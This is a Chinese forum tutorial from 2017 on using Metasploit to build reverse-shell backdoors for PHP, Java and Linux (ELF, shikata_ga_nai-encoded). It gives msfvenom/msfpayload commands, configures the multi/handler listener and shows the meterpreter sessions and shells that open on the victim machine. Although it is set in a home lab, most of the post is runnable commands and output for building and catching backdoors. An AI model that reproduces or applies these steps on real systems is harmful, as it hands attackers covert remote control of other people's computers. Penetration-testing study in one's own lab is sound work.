msf渗透linux教程,Metasploit后门渗透Linux系统以及跨平台后门生成

本帖最后由 小爱_Joker 于 2017-3-9 12:30 编辑

标题:Metasploit后门渗透Linux系统以及跨平台后门生成

作者:小爱_Joker

难度:两级

阅读点:使用Metasploit生成多种后门从而快速渗透linux系统上次发的那个Metasploit使用php后门渗透linux主机 不造为啥不能shell 使用终端 有点尴尬。

攻击者IP:192.168.0.5

受害者IP:192.168.0.3

1:PHP后门生成

[AppleScript] 纯文本查看 复制代码msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.5 -f raw >/root/桌面/test.php

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170308141854.png (388.35 KB, 下载次数: 83)

2017-3-9 17:47 上传

首先先来讲解一下LHOST= 什么意思 LHOST 是本机IP地址 也就是在内网中的 不知道的可以ifconfig 查看一下 由于我虚拟机是直接复制的物理机网络所以直接使用eth0

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170308141440.png (415.41 KB, 下载次数: 124)

2017-3-9 17:47 上传

PHP后门生成如下图

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170308141705.png (439.06 KB, 下载次数: 94)

2017-3-9 17:47 上传

$ip = '192.168.0.5'; $port = 4444  192.168.0.5是我在内网中的IP 上面已经说过了 这个4444 就是我监听的端口 上面我没有配置监听端口 Msf默认监听端口为:4444

配置Metasploit

[AppleScript] 纯文本查看 复制代码msf > use exploit/multi/handler //使用模块

msf exploit(handler) > set lhost IP //设置kali的ip 不知道的可以ifconfig 查看一下

msf exploit(handler) > set payload php/meterpreter/reverse_tcp //设置我们测试的载荷

msf exploit(handler) > run //监听Msf后门这方面 都是用的msf的handler模块 通常都是以上配置方法

配置完成后run //监听一下 如下图

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170308172732.png (492.23 KB, 下载次数: 85)

2017-3-9 17:48 上传

由于我搭建好php运行环境了  我们运行一下

[AppleScript] 纯文本查看 复制代码service apache2 start //开启apache2服务打开 http://192.168.0.5/test.php  msf成功连接

这里我吧生成的php后门放到了kali下的/var/www/html目录8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170308172919.png (884.29 KB, 下载次数: 108)

2017-3-9 17:48 上传

测试成功后 我们exit  退出  继续测试连接windows

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170308173303.png (911.25 KB, 下载次数: 115)

2017-3-9 17:50 上传

成功连接

shell 如下图

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170308173330.png (505.29 KB, 下载次数: 96)

2017-3-9 17:49 上传

2:java后门

[AppleScript] 纯文本查看 复制代码msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.0.5 -o /root/桌面/test.jar

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309175635.png (130.75 KB, 下载次数: 91)

2017-3-9 17:56 上传

接着我们转到msf

吧生成后的后门移到windows上打开一下 我们可以看到我们的msf成功上线

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309175926.png (448.01 KB, 下载次数: 110)

2017-3-9 18:00 上传

[AppleScript] 纯文本查看 复制代码msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.0.5

lhost => 192.168.0.5

msf exploit(handler) > set payload java/meterpreter/reverse_tcp

payload => java/meterpreter/reverse_tcp

msf exploit(handler) > run

Started reverse TCP handler on 192.168.0.5:4444 Starting the payload handler... Sending stage (49645 bytes) to 192.168.0.3[/size][/font][font=仿宋,仿宋_GB2312][size=3] Meterpreter session 1 opened (192.168.0.5:4444 -> 192.168.0.3:10753) at 2017-03-09 17:59:14 +0800

meterpreter >

shell

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309180038.png (259.06 KB, 下载次数: 99)

2017-3-9 18:00 上传

linux系统测试如下

exit  退出

run 监听

[AppleScript] 纯文本查看 复制代码root@xaiSec:~/桌面# java -jar test.jar

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309180258.png (365.36 KB, 下载次数: 114)

2017-3-9 18:03 上传

3:Linux后门

Ps:这里我拿kali1.0测试 2016的不知道咋回事有linux模块生成的时候有点错误

攻击者IP:192.168.0.9

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309193322.png (61.33 KB, 下载次数: 111)

2017-3-9 19:36 上传

实战如下[AppleScript] 纯文本查看 复制代码root@xaiSec:~# msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.9 LPORT=4444 R| msfencode -t elf -e x86/shikata_ga_nai >> /root/Desktop/test

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309194338.png (56.49 KB, 下载次数: 104)

2017-3-9 19:43 上传

配置Metasploit 如下

[AppleScript] 纯文本查看 复制代码msf > use exploit/multi/handler

msf exploit(handler) > set lhost 192.168.0.9

lhost => 192.168.0.9

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

payload => linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > run

Started reverse handler on 192.168.0.9:4444 Starting the payload handler...8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309194446.png (85.39 KB, 下载次数: 114)

2017-3-9 19:45 上传

直接./test 运行的话 它会提示没有运行权限

接着我们来赋予它执行权限

[AppleScript] 纯文本查看 复制代码root@xaiSec:~# cd /root/Desktop

root@xaiSec:~/Desktop# ls

test

root@xaiSec:~/Desktop# ./test

bash: ./test: 权限不够

root@xaiSec:~/Desktop# chmod +x ./test

root@xaiSec:~/Desktop# ./test

赋予执行权限运行后 我们的msf成功上线

如下图

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309194833.png (131.51 KB, 下载次数: 115)

2017-3-9 19:49 上传

shell 如下图

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ图片20170309195008.png (97.65 KB, 下载次数: 108)

2017-3-9 19:50 上传

运行下linux命令试一下

成功 如下图

8f3ff2fbfdd7c7c8339951a6542705fa.gif

QQ截图20170309195110.png (100.32 KB, 下载次数: 100)

2017-3-9 19:51 上传

本次文章到这里了  写了一天 不是特别麻烦 因为2016的kali我没有更新源等一系列问题 所以更新源之类的耽误了点时间. 接着linux后门的时候 2016有点小错误 下的1.0kali 虚拟机安装 实战的 所以耽误了点时间

另外:结束语:勿忘初心 方得始终.